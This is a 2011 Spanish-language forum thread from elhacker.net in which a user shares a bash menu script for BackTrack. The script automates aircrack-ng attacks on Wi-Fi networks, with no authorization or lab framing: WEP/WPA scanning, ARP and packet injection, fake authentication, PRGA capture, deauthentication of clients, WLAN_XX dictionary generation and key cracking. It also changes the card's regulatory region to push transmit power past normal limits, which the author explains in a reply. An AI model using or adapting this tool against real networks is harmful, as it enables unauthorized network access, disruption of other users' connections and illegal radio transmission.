elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.


 


Tema destacado: ¿Eres nuevo? ¿Tienes dudas acerca del funcionamiento de la comunidad? Lee las Reglas Generales


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking Wireless
| | |-+  Wireless en Linux
| | | |-+  Script -- Suite Crack Wireless.
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: Script -- Suite Crack Wireless.  (Leído 3,158 veces)
RocKHounD

Desconectado Desconectado

Mensajes: 46


Ver Perfil WWW
Script -- Suite Crack Wireless.
« en: 11 Enero 2011, 00:12 »

Hola a todos,

Hace tiempo cree el siguiente script que quiero compartir con vosotros, el codigo bueno... probablemente pueda depurarse casi en su total, aun asi funciona.
Esta creado para funcionar en BT4 con Chipset RTL.

La tercera linea del script puede modificarse para cambiarel chipset,
wlandecrypter esta implementado en el script aunque debe encontrarse en /usr/sbin.

Espero mejoras y demas.

Como comente a ChimoC he creado un blog para temas de scripting y de tecnicas de nivel medio alto en el que me gustaria que participaseis todos.

Seguire aportando aqui las cosas que me ronden la cabeza.

Un saludo,

Si no puedo poner este enlace, borrar unicamente esta parte pero no borreis mi aporte,

Gracias

http://btcode.blogspot.com


Citar
Código
  1. #!/bin/bash
  2. airmon-ng stop mon0 >> /dev/null
  3. clear
  4. RTL8187=`airmon-ng |grep "rtl" |awk '{print $1}'`
  5. echo [*] Cambiando la region de la tarjeta...
  6. iw reg set BO
  7. sleep 2
  8. echo [*] Cambiando la potencia maxima a la tarjeta
  9. iwconfig $RTL8187 txpower 30
  10. sleep 2
  11. echo [*] Habilitando Modo Monitor...
  12. sleep 2
  13. airmon-ng start $RTL8187 >> /dev/null
  14. echo [*] Modo Monitor Habilitado
  15. sleep 2
  16. echo [*] Falsficando Mac Address
  17. sleep 2
  18. echo [*] Mac Address Falsificada
  19. sleep 2
  20. echo
  21. echo
  22. clear
  23.  
  24. monitor=`ifconfig |grep "mon0" |awk '{print $1}'`
  25. mimac=00:11:22:33:44:55
  26.  
  27.  
  28. rm out*
  29. rm rep*
  30. rm *.xor
  31. rm *.diccionario
  32. rm *-request
  33. rm temp*
  34. while :
  35. do
  36. clear
  37. echo
  38. echo "1. Escanear todas las redes con cifrado WEP "
  39. echo "2. Escanear todas las redes con cifrado WPA "
  40. echo "3. Escanear una red en particular"
  41. echo "4. Lanzar Airodump-ng "
  42. echo "5. Lanzar Aireplay-ng modo Selectivo"
  43. echo "6. Lanzar Aireplay-ng modo inyectar ARP"
  44. echo "7. Lanzar Aireplay-ng modo asociacion falsa V1"
  45. echo "8. Lanzar Aireplay-ng modo asociacion falsa V2"
  46. echo "9. Lanzar Aireplay-ng modo asociacion falsa V3"
  47. echo "10. Lanzar Aireplay-ng para obtener el  PRGA"
  48. echo "11. Lanzar Aireplay-ng fragmentado para obtener PRGA"
  49. echo "12. Lanzar Packetforge-ng para crear un paquete ARP"
  50. echo "13. Lanzar Aireplay-ng para inyectar el paquete creado"
  51. echo "14. Lanzar Aireplay-ng para realizar una denegacion "
  52. echo "15. Crear un diccionario para redes WLAN_XX"
  53. echo "16. Lanzar Aircrack-ng para crackear la password"
  54. echo "17. Lanzar Aircrack-ng PTW para crackear la password"
  55. echo "18. Lanzar Aircrack-ng para crackear una password WLAN_XX"
  56. echo "19. Cambiar Mac Asociada"
  57. echo "20. Probar Si la tarjeta Inyecta correctamente"
  58. echo "21. Modificar la sensibilidad de la tarjeta"
  59. echo "22. Salir"
  60. echo ""
  61. echo "Elige una opcion"
  62. read opt
  63.  
  64. case $opt in
  65. 1) xterm -geometry 90x15+500+0 -fg yellow -bg black -hold -title "Esnifando paquetes" -e airodump-ng $monitor -a --encrypt wep -w temp &;;
  66. 2) xterm -geometry 90x15+500+0 -fg yellow -bg black -hold -title "Esnifando paquetes" -e airodump-ng $monitor -a --encrypt wpa -w temp &;;
  67. 3) cat  temp-01.csv | awk '{print $1,$20,$6}' >> temp-00001.csv;
  68. clear;
  69. cat temp-00001.csv;
  70. echo "Selecciona el Bssid";
  71. read macap;
  72. echo "Selecciona el Essid"
  73. read nombreap
  74. echo "Selecciona Canal";
  75. read canal;
  76. killall xterm;
  77. rm temp-*;;
  78. 4) xterm -hold -geometry 90x15+500+0 -fg yellow -bg black -title "Esnifando Paquetes" -e airodump-ng $monitor -a --bssid $macap -c $canal -w out &;;
  79. 5) xterm -hold -geometry 90x15+500+200 -fg yellow -bg black -title "Ataque Selectivo" -e aireplay-ng -2 -p 0841 -m 68 -n 86 -c FF:FF:FF:FF:FF:FF -b $macap -h $mimac $monitor &;;
  80. 6) xterm -hold -geometry 90x15+500+200 -fg yellow -bg black -title "Inyectando Arp" -e aireplay-ng -3 -b $macap -h $mimac $monitor &;;
  81. 7) xterm -geometry 90x15+0+0 -fg yellow -bg black -title "Asociando a $nombreap" -e aireplay-ng -1 0 -a $macap -h $mimac $monitor &;;
  82. 8) xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Asociando a $nombreap" -e aireplay-ng -1 6000 -o 1 -q 10 -a $macap -h $mimac $monitor &;;
  83. 9) echo "Seleccina el numero de paquetes para la autenticacion";
  84. read num;
  85. xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Asociando a $nombreap con $num paquetes" -e aireplay-ng -1 0 -a $macap -h $mimac -o $num $monitor &;;
  86. 10) xterm -geometry 90x15+500+400 -fg yellow -bg black -title "Creando XOR" -e aireplay-ng -4 -b $macap -h $mimac $monitor &;;
  87. 11) xterm -geometry 90x15+500+400 -fg yellow -bg black -title "Creando XOR" -e aireplay-ng -5 -b $macap -h $mimac $monitor &;;
  88. 12) packetforge-ng -0 -a $macap -h $mimac -k 255.255.255.255 -l 255.255.255.255 -y *.xor -w arp-request &;;
  89. 13) xterm -geometry 90x15+500+400 -fg yellow -bg black -hold -title "Inyectando Paquete especial" -e aireplay-ng -2 -r arp-request -h $mimac $monitor &;;
  90. 14) xterm -geometry 90x15+0+200 -fg yellow -bg black -title "Deautenticando a $mimac" -e aireplay-ng -0 1 -a $macap -c $mimac $monitor &;;
  91. 15) xterm -e wlandecrypter $macap $nombreap $nombreap.diccionario;;
  92. 16) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 *.cap;;
  93. 17) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 -P 2 *.cap;;
  94. 18) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Crackeando $nombreap" -e aircrack-ng -a 1 *.cap -w $nombreap.diccionario;;
  95. 19) echo "Escribe la nueva Mac Asociada";
  96. read mimac;;
  97. 20) xterm -geometry 90x15+0+400 -fg yellow -bg black -hold -title "Probando Inyeccion" -e aireplay-ng -9 -a $macap -e $nombreap $monitor &;;
  98. 21) echo "Selecciona la sensibilidad";
  99. echo "1M Mayor sensibilidad o 54M Mayor alcance";
  100. read sens;
  101. iwconfig $monitor rate $sens;;
  102. 22) exit 1;;
  103. *) echo "la opcion $opt no es valida, usa una entre 1 - 22";
  104. echo "Presiona enter para continuar"
  105. read enterKey;;
  106. esac
  107. done
  108.  
« Última modificación: 11 Enero 2011, 12:39 por RocKHounD » En línea

Franny


Desconectado Desconectado

Mensajes: 846


Software Developer


Ver Perfil WWW
Re: Script -- Suite Crack Wireless.
« Respuesta #1 en: 9 Febrero 2011, 07:36 »

se agradece...

no tenia idea que se podia modificar la potencia de la tarjeta.. podrias comentar mas informacion al respecto de iwconfig $RTL8187 txpower 30 please... te lo agradeceria muchisimo...saludos
En línea

RocKHounD

Desconectado Desconectado

Mensajes: 46


Ver Perfil WWW
Re: Script -- Suite Crack Wireless.
« Respuesta #2 en: 15 Febrero 2011, 00:36 »

Primero hay que cambiar la region de la tarjeta, si no, no te permite modificar el TX POWER,

solo lo he probado con las alfa 1W supongo que todas las de 1000mW tendrán las mismas caracteristicas.
En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Manual Hacking Wireless en Windows XP usando la suite aircrack « 1 2 ... 7 8 »
Wireless en Windows
Carloswaldo 79 209,034 Último mensaje 1 Enero 2009, 00:56
por Carloswaldo
[shell script] ayuda con script, :( « 1 2 »
Scripting
dark_fidodido 14 7,652 Último mensaje 16 Septiembre 2009, 10:28
por dark_fidodido
script bash (ubuntu): Parar un proceso sin salir del script (SOLUCIONADO)
Scripting
moikano→@ 6 9,398 Último mensaje 28 Octubre 2010, 15:48
por moikano→@
Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines